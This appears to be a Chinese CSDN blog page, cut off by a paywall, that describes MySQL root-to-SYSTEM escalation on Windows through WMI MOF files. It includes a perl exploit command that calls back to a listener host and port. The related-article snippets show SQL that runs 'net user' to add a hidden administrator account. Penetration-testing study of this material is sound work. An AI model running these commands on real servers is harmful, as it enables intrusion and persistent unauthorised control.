mysql root 提权_技术干货:MySQL数据库Root权限MOF方法提权研究

最新推荐文章于 2024-05-29 14:48:53 发布
最新推荐文章于 2024-05-29 14:48:53 发布
阅读量190 收藏
点赞数
文章标签: mysql root 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35897853/article/details/113152345
版权

【51CTO.com原创稿件】MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:

方法1:运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。

方法2:使用 IMofCompiler 接口和 $ CompileFile 方法。

方法3:拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。

Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。第三种方法仅为向后兼容性与早期版本的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。注意使用MOF方法提权的前提是当前Root帐号可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下,否则会失败!

001漏洞利用方法分析

该漏洞的利用前提条件是必须具备mysql的root权限,在Kingcope公布的0day中公布了一个pl利用脚本。

perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555

192.168.2.100为mysql数据库所在服务

最低0.47元/天 解锁文章
贺仙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysqlroot登陆看不到库_Log-MySQL root 用户登录后无法查看数据库全部表 / 正常访问数据库 Access denied for - 链滴...
weixin_30322969的博客
01-28 695
今天在对 MySQL 进行建表、权限设置之后,突然发现没有了数据库的操作权限:mysql> show databases;+--------------------+| Database |+--------------------+| mysql |+--------------------+1 rows in set (0.00 sec)WT...
mof提权文件nullevt.mof
03-12
其就是用又了mysqlroot权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp....
mysqlroot权限提权
02-28
mysqlroot权限提权
MySQL数据库Root权限MOF方法提权研究
Fly_鹏程万里
07-06 915
MySQL数据库Root权限MOF方法提权研究MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL W...
数据库Mysql提权
最新发布
白帽黑客鹏哥的博客
05-29 1065
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
Mysql数据库root用户权限缺失的解决
hualidezhen的博客
05-18 8845
最近再跟着做一个与mysql数据库有关系的项目、再开始到时候就遇到了一些数据库的问题。 不知道当时按了什么,导致root超级管理员的的权限缺失、导致无法连接到本地的mysql数据库 从而导致不管是进行任何操作都没有了权限、想要找出问题都没有权限能够给我、当时用navicat连接数据库的错误就是这个形式: 1045错误,肯定很多人都遇到过,常见的解决方法就是修改root密码或者确认root密码是否正确、然后我也跟着试了,发现还是没有效果,最后我对比之前的另外一个 的项目的root对比发现了一些不.
Mysql数据库提权
weixin_44023460的博客
07-12 1295
Root用户的密码还可能从网页脚本文件中获得,数据库连接直接使用root用户。分别在查询中输入脚本“select shell(‘cmd’,‘net user temp temp123456’)”、“select shell(‘cmd’,'net localgroup administrators temp /add ')”并执行该查询命令,如果执行成功,则表示在系统中添加“temp”用户,密码为“temp123456”,同时将该用户添加到管理员组中,使其具备管理员权限,执行成功后如图5,图6所示。
Mysql UDF、MOF、反链端口提权.zip
12-14
Mysql UDF、MOF、反链端口提权
第60天:权限提升-MY&MS&ORA等SQL数据库提权1
08-03
在网络安全和渗透测试中,权限提升是一个关键环节,尤其是在无法利用系统级溢出漏洞时,数据库提权成为了攻击者常用的技术。本篇文章将详细讲解如何针对MY&MS&ORA等SQL数据库进行提权,以及涉及的相关知识点。 首先...
msf攻击Mysql服务.docx
04-26
2. **exploit/multi/mysql/mysql_udf_payload**:该插件专注于利用MySQL的User Defined Function (UDF)机制,通常用于root权限启动的MySQL服务,以实现root级别的提权攻击。 3. **exploit/windows/mysql/mysql_mof*...
MOF_papers:@MOF_papers Twitter机器人的代码和数据
02-12
"MOF_papers:@MOF_papers Twitter机器人的代码和数据" 这个标题表明,这是一个关于创建和维护Twitter机器人的项目,特别关注的是Metal-Organic Frameworks(MOFs)领域的最新研究论文。@MOF_papers 是这个机器人在...
mysql用户root提权
11-13
mysql用户rootmysql用户root
mysql root 提权_mysqlROOT权限提权方法
weixin_30111277的博客
01-18 1155
mysql .x里面引入了一个system函数,这个函数可以执行系统命令,当mysqlroot登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行mysql>system vi /et...
权限提升-MYSQL数据库提权
m0_65336233的博客
12-05 1788
提权漏洞-数据库提权
提权-MySQL数据库提权
acepanhuan的博客
02-28 1805
提权-MySQL数据库提权
MySql数据库提权学习总结
Haakure的博客
10-21 593
sqlmap\data\udf\mysql\windows\64目录下生成一个dll的文件lib_mysqludf_sys.dll,这个我们就可以直接拿来利用。在windows系统中,配置文件my.ini在 MySql 安装的根目录下,也有可能在隐藏文件夹“ProgramData”下。在Linux系统中,MySQL的配置文件位于/etc/mysql/my.cnf。secure_file_priv是用来限制mysql数据库导出的位置/目录。安装路径下的data目录存放的是数据库的数据信息。
AAA-------网安的一种管理机制--认证授权计费
2401_84970893的博客
05-12 402
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
MySQL提权
m0_58606546的博客
11-28 5873
MySQL提权的必要条件: 具有MySQLroot权限,且MySQL以system权限运行。 具有执行SQL语句的权限。 获取root密码的方法: 查看数据库配置文件关键字:config、conn、sql、data、inc、database等 下载mysql安装路径下的数据文件 安装路径下的data目录中存放的是数据库的数据信息 root账号密码存储在mysql数据库下的user表中 完整路径=安装路径+\data\mysql\user.MYD 3.暴力破解 MySQL数据库提...
mysql mof提权原理_mof提权原理及其过程
05-16
Mof提权的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行权限来执行Mof文件中的命令,从而实现提权。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值